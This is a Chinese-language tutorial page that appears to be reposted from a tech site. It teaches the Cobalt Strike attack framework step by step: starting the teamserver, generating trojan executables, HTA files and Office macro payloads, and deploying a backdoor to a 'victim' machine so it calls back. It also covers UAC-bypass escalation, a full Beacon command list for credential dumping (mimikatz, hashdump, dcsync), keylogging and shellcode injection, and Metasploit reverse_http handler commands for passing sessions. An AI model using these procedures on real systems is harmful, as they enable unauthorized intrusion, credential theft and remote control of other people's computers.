溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

如何進(jìn)行內(nèi)網(wǎng)滲透神器簡(jiǎn)單使用

發(fā)布時(shí)間:2021-12-24 14:09:55 來(lái)源:億速云 閱讀:138 作者:柒染 欄目:網(wǎng)絡(luò)管理

如何進(jìn)行內(nèi)網(wǎng)滲透神器簡(jiǎn)單使用,很多新手對(duì)此不是很清楚,為了幫助大家解決這個(gè)難題,下面小編將為大家詳細(xì)講解,有這方面需求的人可以來(lái)學(xué)習(xí)下,希望你能有所收獲。

一、介紹內(nèi)網(wǎng)滲透的神器工具CobaltStrike

Cobalt Strike 一款以Metasploit為基礎(chǔ)的GUI框架式滲透測(cè)試工具,集成了端口轉(zhuǎn)發(fā)、服務(wù)掃描,自動(dòng)化溢出,多模式端口監(jiān)聽(tīng),exe、powershell木馬生成等。

釣魚攻擊包括:站點(diǎn)克隆,目標(biāo)信息獲取,java執(zhí)行,瀏覽器自動(dòng)攻擊等。

Cobalt Strike 主要用于團(tuán)隊(duì)作戰(zhàn),可謂是團(tuán)隊(duì)滲透神器,能讓多個(gè)攻擊者同時(shí)連接到團(tuán)體服務(wù)器上,共享攻擊資源與目標(biāo)信息和sessions。

Cobalt Strike 作為一款協(xié)同APT工具,針對(duì)內(nèi)網(wǎng)的滲透測(cè)試和作為apt的控制終端功能,使其變成眾多APT組織的首選。

文件內(nèi)容如下:

如何進(jìn)行內(nèi)網(wǎng)滲透神器簡(jiǎn)單使用

二、啟動(dòng)CobaltStrike

1.啟動(dòng)服務(wù)端CobaltStrike

服務(wù)端關(guān)鍵文件teamserver與cobaktstrike.jar

打開(kāi)命令界面,切換到文件夾目錄下,輸入sudo ./teamserver <host> <password> [/path/to/c2.profile]

1 - 必填參數(shù)host 本服務(wù)器外網(wǎng)IP/域名

2 - 必填參數(shù)password Client GUI連接時(shí)需要輸入的密碼

3 - 可選參數(shù)Malleable C2 communication profile 指定C2通信配置文件該功能體現(xiàn)了CS

示例:本機(jī)IP:192.168.1.136

如何進(jìn)行內(nèi)網(wǎng)滲透神器簡(jiǎn)單使用

2.打開(kāi)客戶端cobaltstrike.jar,配置按照啟動(dòng)服務(wù)的配置進(jìn)行。

如何進(jìn)行內(nèi)網(wǎng)滲透神器簡(jiǎn)單使用

點(diǎn)擊連接,進(jìn)入主界面。

如何進(jìn)行內(nèi)網(wǎng)滲透神器簡(jiǎn)單使用

三、參數(shù)介紹

1.Cobalt Strike

如何進(jìn)行內(nèi)網(wǎng)滲透神器簡(jiǎn)單使用

1- 新建鏈接(可以支持多個(gè)服務(wù)端)

2- 設(shè)置(配置控制臺(tái)界面)

3- 可視化(展示控制的形式)

4- VPN接口(配置VPN)

5- 監(jiān)聽(tīng)器(管理監(jiān)聽(tīng)配置)

6- 腳本管理器(管理腳本,用于管理第三方腳本)

2.視圖

如何進(jìn)行內(nèi)網(wǎng)滲透神器簡(jiǎn)單使用

1- 應(yīng)用信息(顯示被攻擊著的機(jī)器的應(yīng)用信息)

2- 憑證信息(通過(guò)hashdump或者獼猴桃抓到的密碼都會(huì)保存到此處)

3- 文件下載(下載文件)

4- 日志(事件記錄)

5- 鍵盤記錄

6- 代理信息

7- 屏幕截圖(截取被攻擊者的屏幕)

8- 腳本控制臺(tái)(腳本的命令執(zhí)行的界面)

9- 目標(biāo)(顯示目標(biāo)主機(jī))

10- web日志

如何進(jìn)行內(nèi)網(wǎng)滲透神器簡(jiǎn)單使用

3.攻擊

如何進(jìn)行內(nèi)網(wǎng)滲透神器簡(jiǎn)單使用

1- HTML Application (生成惡意的HTA木馬文件)

2- MS Office Macro (生成office宏病毒文件)

3- Payload Generator (生成各種語(yǔ)言版本的payload)

4- Windows Executable (生成可執(zhí)行Payload)

5- Windows Executable(S)(把包含payload,Stageless生成可執(zhí)行文件(包含多數(shù)功能)

如何進(jìn)行內(nèi)網(wǎng)滲透神器簡(jiǎn)單使用

1- web服務(wù)管理(對(duì)開(kāi)啟的web服務(wù)進(jìn)行管理)

2- 克隆網(wǎng)站

3- 文件下載(提供web下載文件)

4- Scripted Web Delivery (提供Web服務(wù),便于下載和執(zhí)行PowerShell Payload,類似于Metasploit的web_delivery)

5- 簽名Applet攻擊(啟動(dòng)一個(gè)Web服務(wù)以提供自簽名Java Applet的運(yùn)行環(huán)境)

6- 智能攻擊(自動(dòng)檢測(cè)Java版本并利用已知的exploits繞過(guò)security)

7- 信息搜集(獲取系統(tǒng)信息)

4.beacon命令

beacon> help

Beacon Commands

===============

Command                   Description

-------                   -----------

argue                     進(jìn)程參數(shù)欺騙

blockdlls                 阻止子進(jìn)程加載非Microsoft DLL

browserpivot              注入受害者瀏覽器進(jìn)程

bypassuac                 繞過(guò)UAC提升權(quán)限

cancel                    取消正在進(jìn)行的下載

cd                        切換目錄

checkin                   強(qiáng)制讓被控端回連一次

clear                     清除beacon內(nèi)部的任務(wù)隊(duì)列

connect                   Connect to a Beacon peer over TCP

covertvpn                 部署Covert VPN客戶端

cp                        復(fù)制文件

dcsync                    從DC中提取密碼哈希

desktop                   遠(yuǎn)程桌面(VNC)

dllinject                 反射DLL注入進(jìn)程

dllload                   使用LoadLibrary將DLL加載到進(jìn)程中

download                  下載文件

downloads                 列出正在進(jìn)行的文件下載

drives                    列出目標(biāo)盤符

elevate                   使用exp

execute                   在目標(biāo)上執(zhí)行程序(無(wú)輸出)

execute-assembly          在目標(biāo)上內(nèi)存中執(zhí)行本地.NET程序

exit                      終止beacon會(huì)話

getprivs                  Enable system privileges on current token

getsystem                 嘗試獲取SYSTEM權(quán)限

getuid                    獲取用戶ID

hashdump                  轉(zhuǎn)儲(chǔ)密碼哈希值

help                      幫助

inject                    在注入進(jìn)程生成會(huì)話

jobkill                   結(jié)束一個(gè)后臺(tái)任務(wù)

jobs                      列出后臺(tái)任務(wù)

kerberos_ccache_use       從ccache文件中導(dǎo)入票據(jù)應(yīng)用于此會(huì)話

kerberos_ticket_purge     清除當(dāng)前會(huì)話的票據(jù)

kerberos_ticket_use       Apply 從ticket文件中導(dǎo)入票據(jù)應(yīng)用于此會(huì)話

keylogger                 鍵盤記錄

kill                      結(jié)束進(jìn)程

link                      Connect to a Beacon peer over a named pipe

logonpasswords            使用mimikatz轉(zhuǎn)儲(chǔ)憑據(jù)和哈希值

ls                        列出文件

make_token                創(chuàng)建令牌以傳遞憑據(jù)

mimikatz                  運(yùn)行mimikatz

mkdir                     創(chuàng)建一個(gè)目錄

mode dns                  使用DNS A作為通信通道(僅限D(zhuǎn)NS beacon)

mode dns-txt              使用DNS TXT作為通信通道(僅限D(zhuǎn) beacon)

mode dns6                 使用DNS AAAA作為通信通道(僅限D(zhuǎn)NS beacon)

mode http                 使用HTTP作為通信通道

mv                        移動(dòng)文件

net                       net命令

note                      備注

portscan                  進(jìn)行端口掃描

powerpick                 通過(guò)Unmanaged PowerShell執(zhí)行命令

powershell                通過(guò)powershell.exe執(zhí)行命令

powershell-import         導(dǎo)入powershell腳本

ppid                      Set parent PID for spawned post-ex jobs

ps                        顯示進(jìn)程列表

psexec                    Use a service to spawn a session on a host

psexec_psh                Use PowerShell to spawn a session on a host

psinject                  在特定進(jìn)程中執(zhí)行PowerShell命令

pth                       使用Mimikatz進(jìn)行傳遞哈希

pwd                       當(dāng)前目錄位置

reg                       Query the registry

rev2self                  恢復(fù)原始令牌

rm                        刪除文件或文件夾

rportfwd                  端口轉(zhuǎn)發(fā)

run                       在目標(biāo)上執(zhí)行程序(返回輸出)

runas                     以其他用戶權(quán)限執(zhí)行程序

runasadmin                在高權(quán)限下執(zhí)行程序

runu                      Execute a program under another PID

screenshot                屏幕截圖

setenv                    設(shè)置環(huán)境變量

shell                     執(zhí)行cmd命令

shinject                  將shellcode注入進(jìn)程

shspawn                   啟動(dòng)一個(gè)進(jìn)程并將shellcode注入其中

sleep                     設(shè)置睡眠延遲時(shí)間

socks                     啟動(dòng)SOCKS4代理

socks stop                停止SOCKS4

spawn                     Spawn a session

spawnas                   Spawn a session as another user

spawnto                   Set executable to spawn processes into

spawnu                    Spawn a session under another PID

ssh                       使用ssh連接遠(yuǎn)程主機(jī)

ssh-key                   使用密鑰連接遠(yuǎn)程主機(jī)

steal_token               從進(jìn)程中竊取令牌

timestomp                 將一個(gè)文件的時(shí)間戳應(yīng)用到另一個(gè)文件

unlink                    Disconnect from parent Beacon

upload                    上傳文件

wdigest                   使用mimikatz轉(zhuǎn)儲(chǔ)明文憑據(jù)

winrm                     使用WinRM橫向滲透

wmi                       使用WMI橫向滲透

四、使用Cobalt strike

1.創(chuàng)建監(jiān)聽(tīng)器

如何進(jìn)行內(nèi)網(wǎng)滲透神器簡(jiǎn)單使用

注:cs中提供了8種監(jiān)聽(tīng)器:

beacon_xx 系列為Cobalt Strike自身,包括 dns、http、https、smb 四種方式的監(jiān)聽(tīng)器。

foreign系列為外部監(jiān)聽(tīng)器,通常與MSF或者Armitage聯(lián)動(dòng)。

如何進(jìn)行內(nèi)網(wǎng)滲透神器簡(jiǎn)單使用

創(chuàng)建好之后會(huì)顯示監(jiān)聽(tīng)開(kāi)始

如何進(jìn)行內(nèi)網(wǎng)滲透神器簡(jiǎn)單使用

2.生成后門

點(diǎn)擊攻擊----生成后門---Windows Executable

監(jiān)聽(tīng)器選擇我們剛才創(chuàng)建的,根據(jù)攻擊的系統(tǒng)選擇64位還是32位。

如何進(jìn)行內(nèi)網(wǎng)滲透神器簡(jiǎn)單使用

保存生成后門的exe文件。

3.連接

將生成的后門程序,上傳到受害者的機(jī)器上,運(yùn)行,發(fā)現(xiàn)主機(jī)上線。

如何進(jìn)行內(nèi)網(wǎng)滲透神器簡(jiǎn)單使用

在主機(jī)右鍵,進(jìn)入beacon,可以進(jìn)行下一步命令執(zhí)行操作。

如何進(jìn)行內(nèi)網(wǎng)滲透神器簡(jiǎn)單使用

備注:beacon的命令執(zhí)行功能較少用起來(lái)不方便,可以使用Ladon腳本。

Ladon腳本下載地址:https://github.com/k8gege/Ladon

Ladon具體使用方法:https://github.com/k8gege/Aggressor

4.提權(quán)

在上線主機(jī)右鍵后,點(diǎn)擊提權(quán),選擇uac提權(quán)。

如何進(jìn)行內(nèi)網(wǎng)滲透神器簡(jiǎn)單使用

成功后會(huì)出現(xiàn)一個(gè)新的主機(jī)。之后的操作可以在新的主機(jī)進(jìn)行。

如何進(jìn)行內(nèi)網(wǎng)滲透神器簡(jiǎn)單使用

五、與MSF聯(lián)動(dòng)

Kali IP:172.16.20.18

受害者機(jī)器:172.16.20.20

CS:172.16.20.19

1.在MSF中創(chuàng)建監(jiān)聽(tīng)器

msf5 > use exploit/multi/handler

[*] Using configured payload generic/shell_reverse_tcp

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_http

payload => windows/meterpreter/reverse_http

msf5 exploit(multi/handler) > set lhost 172.16.20.18

lhost => 172.16.20.18

msf5 exploit(multi/handler) > set lport 3333

lport => 3333

msf5 exploit(multi/handler) > run

如何進(jìn)行內(nèi)網(wǎng)滲透神器簡(jiǎn)單使用

注:監(jiān)聽(tīng)監(jiān)聽(tīng)kali自身地址。

2.在CS中設(shè)置新的監(jiān)聽(tīng)地址

如何進(jìn)行內(nèi)網(wǎng)滲透神器簡(jiǎn)單使用

注意:payload要與msf中的payload要一致。

在控制中右鍵--增加會(huì)話,選擇msf的會(huì)話。

如何進(jìn)行內(nèi)網(wǎng)滲透神器簡(jiǎn)單使用

此時(shí)拿到meterpreter。

如何進(jìn)行內(nèi)網(wǎng)滲透神器簡(jiǎn)單使用

輸入shell,進(jìn)入主機(jī)命令操作。

如何進(jìn)行內(nèi)網(wǎng)滲透神器簡(jiǎn)單使用

如何進(jìn)行內(nèi)網(wǎng)滲透神器簡(jiǎn)單使用

看完上述內(nèi)容是否對(duì)您有幫助呢?如果還想對(duì)相關(guān)知識(shí)有進(jìn)一步的了解或閱讀更多相關(guān)文章,請(qǐng)關(guān)注億速云行業(yè)資訊頻道,感謝您對(duì)億速云的支持。

向AI問(wèn)一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI